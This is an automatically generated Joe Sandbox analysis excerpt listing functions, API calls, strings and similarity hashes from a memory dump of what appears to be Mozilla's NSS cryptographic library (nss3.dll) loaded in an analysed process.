Part of subcall function 68D76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,68D7781D,00000000,68D6BE2C,?,68D76B1D,?,?,?,?,00000000,00000000,68D7781D), ref: 68D76C40
Part of subcall function 68D76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,68D7781D,?,68D6BE2C,?), ref: 68D76C58
Part of subcall function 68D76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,68D7781D), ref: 68D76C6F
Part of subcall function 68D76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 68D76C84
Part of subcall function 68D76C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 68D76C96
Part of subcall function 68D76C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 68D76CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 68D76F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 68D76FC5
PK11_GetInternalKeySlot.NSS3 ref: 68D76FF4

Strings

@uU~/, xrefs: 68D76CDC

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: @uU~/
API String ID: 1304971872-2989128320
Opcode ID: c022a0a5b1f644a3b02798559a5c93a5b471ae8bd523e9d4129777f32e92a847
Instruction ID: 602eed9e7532198d8f41677f1514a3a3b32638acdc20827513cfc3f7e9b2e81f
Opcode Fuzzy Hash: c022a0a5b1f644a3b02798559a5c93a5b471ae8bd523e9d4129777f32e92a847
Instruction Fuzzy Hash: 5DB132B5E00219DFDF20CFA5E884B9EBBB4AF06394F444025EA29A7241F731E955CB71

Uniqueness

Uniqueness Score: -1.00%

Function 68D608F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 68D6094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D60953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 68D6096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 68D60974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 68D6098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 68D60995

Part of subcall function 68D61800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 68D61860
Part of subcall function 68D61800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,68D609BF), ref: 68D61897
Part of subcall function 68D61800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 68D618AA
Part of subcall function 68D61800: memcpy.VCRUNTIME140(?,?,?), ref: 68D618C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 68D60B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 68D60B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 68D60B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 68D60B78

Strings

psk_id_hash, xrefs: 68D609B5
base_nonce, xrefs: 68D60B06
key, xrefs: 68D60ACB
info_hash, xrefs: 68D609E0
@uU~/, xrefs: 68D60902
secret, xrefs: 68D60A88
exp, xrefs: 68D60B36

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: @uU~/$base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-2334530677
Opcode ID: bc620dca184bb0db280e2f1877db9d65aea65c0036c53302e7b43c581d69f842
Instruction ID: fc1a6526929d4daa5dbcc347843b616e30770a1ca0bd86856572162fce7bf509
Opcode Fuzzy Hash: bc620dca184bb0db280e2f1877db9d65aea65c0036c53302e7b43c581d69f842
Instruction Fuzzy Hash: 1981AA7A604306AFC700CF54D88096AF7E8FF8C268F448919F99997251E731EA55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 68DC28C0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 68DC5B40: PR_GetIdentitiesLayer.NSS3 ref: 68DC5B56

TlsGetValue.KERNEL32 ref: 68DC290A
EnterCriticalSection.KERNEL32(00000001), ref: 68DC291E
TlsGetValue.KERNEL32 ref: 68DC2937
EnterCriticalSection.KERNEL32(00000001), ref: 68DC294B
PR_EnterMonitor.NSS3(?), ref: 68DC2966
PR_EnterMonitor.NSS3(?), ref: 68DC29AC
PR_ExitMonitor.NSS3(?), ref: 68DC29D1
PR_EnterMonitor.NSS3(?), ref: 68DC29F0
PR_EnterMonitor.NSS3(?), ref: 68DC2A15
PR_EnterMonitor.NSS3(?), ref: 68DC2A37
PR_ExitMonitor.NSS3(?), ref: 68DC2A61
PR_ExitMonitor.NSS3(?), ref: 68DC2A78
PR_ExitMonitor.NSS3(?), ref: 68DC2A8F
PR_ExitMonitor.NSS3(?), ref: 68DC2AA6

Part of subcall function 68DF9440: TlsGetValue.KERNEL32 ref: 68DF945B
Part of subcall function 68DF9440: TlsGetValue.KERNEL32 ref: 68DF9479
Part of subcall function 68DF9440: EnterCriticalSection.KERNEL32 ref: 68DF9495
Part of subcall function 68DF9440: TlsGetValue.KERNEL32 ref: 68DF94E4
Part of subcall function 68DF9440: TlsGetValue.KERNEL32 ref: 68DF9532
Part of subcall function 68DF9440: LeaveCriticalSection.KERNEL32 ref: 68DF955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 68DC2AF9
free.MOZGLUE(?), ref: 68DC2B16
PR_Unlock.NSS3(?), ref: 68DC2B6D
PR_Unlock.NSS3(?), ref: 68DC2B80

Strings

@uU~/, xrefs: 68DC28CF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID: @uU~/
API String ID: 2841089016-2989128320
Opcode ID: c79201308bb84a2edb1f32d64feb248c7f25ba57e3809b3f6cdfada232946a8d
Instruction ID: fd900051e93d3a326856d3f027c5d20d2683f1565e49fb11c5221c2062b6cb2c
Opcode Fuzzy Hash: c79201308bb84a2edb1f32d64feb248c7f25ba57e3809b3f6cdfada232946a8d
Instruction Fuzzy Hash: B681B4B5900B009BEB209F35EC45B97B7E9AF1938CF844939D86AC7211EB31E515CB72

Uniqueness

Uniqueness Score: -1.00%

Function 68D68820 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 68D68846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 68D68874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 68D68883

Part of subcall function 68E4D930: PL_strncpyz.NSS3(?,?,?), ref: 68E4D963

PR_LogPrint.NSS3(?,00000000), ref: 68D68899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 68D688BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 68D688D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 68D688EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 68D68907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 68D68979

Strings

C_DecryptVerifyUpdate, xrefs: 68D68841
(CK_INVALID_HANDLE), xrefs: 68D6887C
pEncryptedPart = 0x%p, xrefs: 68D688B5
*pulPartLen = 0x%x, xrefs: 68D68974
hSession = 0x%x, xrefs: 68D6885E, 68D6886E
pPart = 0x%p, xrefs: 68D688E7
@uU~/, xrefs: 68D6882C
pulPartLen = 0x%p, xrefs: 68D68902
nh, xrefs: 68D68921, 68D68955
ulEncryptedPartLen = %d, xrefs: 68D688CE

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$@uU~/$C_DecryptVerifyUpdate$nh
API String ID: 1003633598-3802530494
Opcode ID: b86b89daef87a3305d09a5525a76c318249cc8465e6c0fc11df24252bc59ce93
Instruction ID: 812e93f5f4101f9eb376a2a6dacff477c5f0a1e871472b4e2e7a418fce58866b
Opcode Fuzzy Hash: b86b89daef87a3305d09a5525a76c318249cc8465e6c0fc11df24252bc59ce93
Instruction Fuzzy Hash: AF41C47A980008EFDF008B54FC84A5E3BA1AF9736CFD44066E91867211D77199A4CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D96CA0 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,68E61DE0,?), ref: 68D96CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 68D96D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 68D96D70
PORT_Alloc_Util.NSS3(00000480), ref: 68D96D82
DER_GetInteger_Util.NSS3(?), ref: 68D96DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 68D96DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 68D96E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 68D96F19
PK11_DigestBegin.NSS3(00000000), ref: 68D96F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 68D96F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 68D97011
PK11_FreeSymKey.NSS3(00000000), ref: 68D97033
free.MOZGLUE(?), ref: 68D9703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 68D97060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 68D97087
PR_SetError.NSS3(FFFFE062,00000000), ref: 68D970AF

Strings

@uU~/, xrefs: 68D96CAF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID: @uU~/
API String ID: 2108637330-2989128320
Opcode ID: 59311570d07aa450a82f86a9e25cec66f46544ac0614f095682218202e8abb9f
Instruction ID: 8697507aff8fef05196bbd3e2d2681f183da19e53912fb557ba408e8512f4838
Opcode Fuzzy Hash: 59311570d07aa450a82f86a9e25cec66f46544ac0614f095682218202e8abb9f
Instruction Fuzzy Hash: 84A1EAB5508200DBEF109F24FC54B6E32A5DB81398F948939EA68CB281EB75D855C7F3

Uniqueness

Uniqueness Score: -1.00%

Function 68D64CD0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 68D64CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 68D64D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 68D64D37

Part of subcall function 68E4D930: PL_strncpyz.NSS3(?,?,?), ref: 68E4D963

PR_LogPrint.NSS3(?,00000000), ref: 68D64D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 68D64D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 68D64D8A
PR_LogPrint.NSS3(?,00000000), ref: 68D64DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 68D64DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 68D64E20

Strings

*pulSize = 0x%x, xrefs: 68D64E1B
(CK_INVALID_HANDLE), xrefs: 68D64D30, 68D64D83
hSession = 0x%x, xrefs: 68D64D12, 68D64D22
C_GetObjectSize, xrefs: 68D64CEE
@uU~/, xrefs: 68D64CD9
pulSize = 0x%p, xrefs: 68D64DB7
hObject = 0x%x, xrefs: 68D64D65, 68D64D75
nh, xrefs: 68D64DD4, 68D64DFF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$@uU~/$C_GetObjectSize$nh
API String ID: 1003633598-2655413845
Opcode ID: 49ad70cc5fc307ddfd48c14cb159eb07e90bb5791e9b1d8581ff6b5fb9ede12e
Instruction ID: 8b23f04fdb6b38fb3645bff8e7284ee1c06138c987b09eabfabc228977e7d514
Opcode Fuzzy Hash: 49ad70cc5fc307ddfd48c14cb159eb07e90bb5791e9b1d8581ff6b5fb9ede12e
Instruction Fuzzy Hash: 9C41177A940108EFDF109B10EC94B6E3766EF973ADFD4406AE51CAB111EB708894CB72

Uniqueness

Uniqueness Score: -1.00%

Function 68D9E8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,68D9E853,?,FFFFFFFF,?,?,68D9B0CC,?,68D9B4A0,?,00000000), ref: 68D9E8D9

Part of subcall function 68D90D30: calloc.MOZGLUE ref: 68D90D50
Part of subcall function 68D90D30: TlsGetValue.KERNEL32 ref: 68D90D6D

Part of subcall function 68D9C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,68D9DAE2,?), ref: 68D9C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 68D9E972
PORT_ArenaMark_Util.NSS3(?), ref: 68D9E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 68D9EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 68D9EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 68D9EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 68D9EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 68D9EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 68D9EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 68D9EB56
PK11_FreeSymKey.NSS3(00000000), ref: 68D9EBC2
SECOID_FindOID_Util.NSS3(?), ref: 68D9EBEC
free.MOZGLUE(00000000), ref: 68D9EC58

Strings

@uU~/, xrefs: 68D9E8CD

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: @uU~/
API String ID: 759478663-2989128320
Opcode ID: 426fb24b6432285167ba76a4a499f6531711da95e1296812ab0dea76f270c562
Instruction ID: 5c7fb09fb97f97a431570d266c1a04fb981edf4dedec23bf0394f7c552e239e4
Opcode Fuzzy Hash: 426fb24b6432285167ba76a4a499f6531711da95e1296812ab0dea76f270c562
Instruction Fuzzy Hash: 44C172B5E00205DFEF04DFA9E880B6A77B4BF09398F440469E956A7351E7B1E840CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68D44CF0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 68D44D80
PORT_Alloc_Util.NSS3(00000000), ref: 68D44D95
PORT_NewArena_Util.NSS3(00000800), ref: 68D44DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 68D44E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 68D44E43
PORT_NewArena_Util.NSS3(00000800), ref: 68D44E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 68D44E85
DER_Encode_Util.NSS3(?,?,68E905A4,00000000), ref: 68D44EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 68D44F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 68D44F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 68D44F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 68D44F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 68D44F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 68D44FC8

Strings

@uU~/, xrefs: 68D44D05

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID: @uU~/
API String ID: 2843999940-2989128320
Opcode ID: 00ea40f450d0b7a124d05364b00887970fe755785ee58e80ba59901aeeb4d86e
Instruction ID: 8e01c0bacdefa8583b00711a6bf2c28b3933f1a748adee43e8938f6444932508
Opcode Fuzzy Hash: 00ea40f450d0b7a124d05364b00887970fe755785ee58e80ba59901aeeb4d86e
Instruction Fuzzy Hash: 8081A475509301DFE720CF24D840B5AB7E5EB85398F844529F9A8DB241EB31D986CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D52C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(68D53F23,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52C62
EnterCriticalSection.KERNEL32(0000001C,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52C76
PL_HashTableLookup.NSS3(00000000,?,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52C86
PR_Unlock.NSS3(00000000,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52C93

Part of subcall function 68DDDD70: TlsGetValue.KERNEL32 ref: 68DDDD8C
Part of subcall function 68DDDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 68DDDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23,?), ref: 68D52CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?,?,68D53F23), ref: 68D52CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?), ref: 68D52CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,68D4E477,?,?,?,00000001,00000000,?), ref: 68D52D4D
EnterCriticalSection.KERNEL32(?), ref: 68D52D61
PL_HashTableLookup.NSS3(?,?), ref: 68D52D71
PR_Unlock.NSS3(?), ref: 68D52D7E

Part of subcall function 68D207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207AD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207CD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207D6
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,68CB204A), ref: 68D207E4
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,68CB204A), ref: 68D20864
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,0000002C), ref: 68D20880
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,68CB204A), ref: 68D208CB
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208D7
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208FB

Strings

@uU~/, xrefs: 68D52C4C

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: @uU~/
API String ID: 2446853827-2989128320
Opcode ID: d7b82fbd89e096aaa7219e9cdc5093b9d0f713a2145db2506532fe2c84cfe7db
Instruction ID: 14cfe85a630c50de1f95b57e7ef7ba63de965430c1dde9004f383c3605767cc1
Opcode Fuzzy Hash: d7b82fbd89e096aaa7219e9cdc5093b9d0f713a2145db2506532fe2c84cfe7db
Instruction Fuzzy Hash: D851C6BAD00605EBDF009F24EC4187A7768EF1A29CB848525ED1997212E731ED65CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 68DA0C60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(68DA2C2A), ref: 68DA0C81

Part of subcall function 68D8BE30: SECOID_FindOID_Util.NSS3(68D4311B,00000000,?,68D4311B,?), ref: 68D8BE44

Part of subcall function 68D78500: SECOID_GetAlgorithmTag_Util.NSS3(68D795DC,00000000,00000000,00000000,?,68D795DC,00000000,00000000,?,68D57F4A,00000000,?,00000000,00000000), ref: 68D78517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 68DA0CC4

Part of subcall function 68D8FAB0: free.MOZGLUE(?,-00000001,?,?,68D2F673,00000000,00000000), ref: 68D8FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 68DA0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 68DA0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 68DA0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 68DA0D7D
free.MOZGLUE(00000000), ref: 68DA0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 68DA0DC1
free.MOZGLUE(00000000), ref: 68DA0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 68DA0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 68DA0E0F

Part of subcall function 68D795C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,68D57F4A,00000000,?,00000000,00000000), ref: 68D795E0
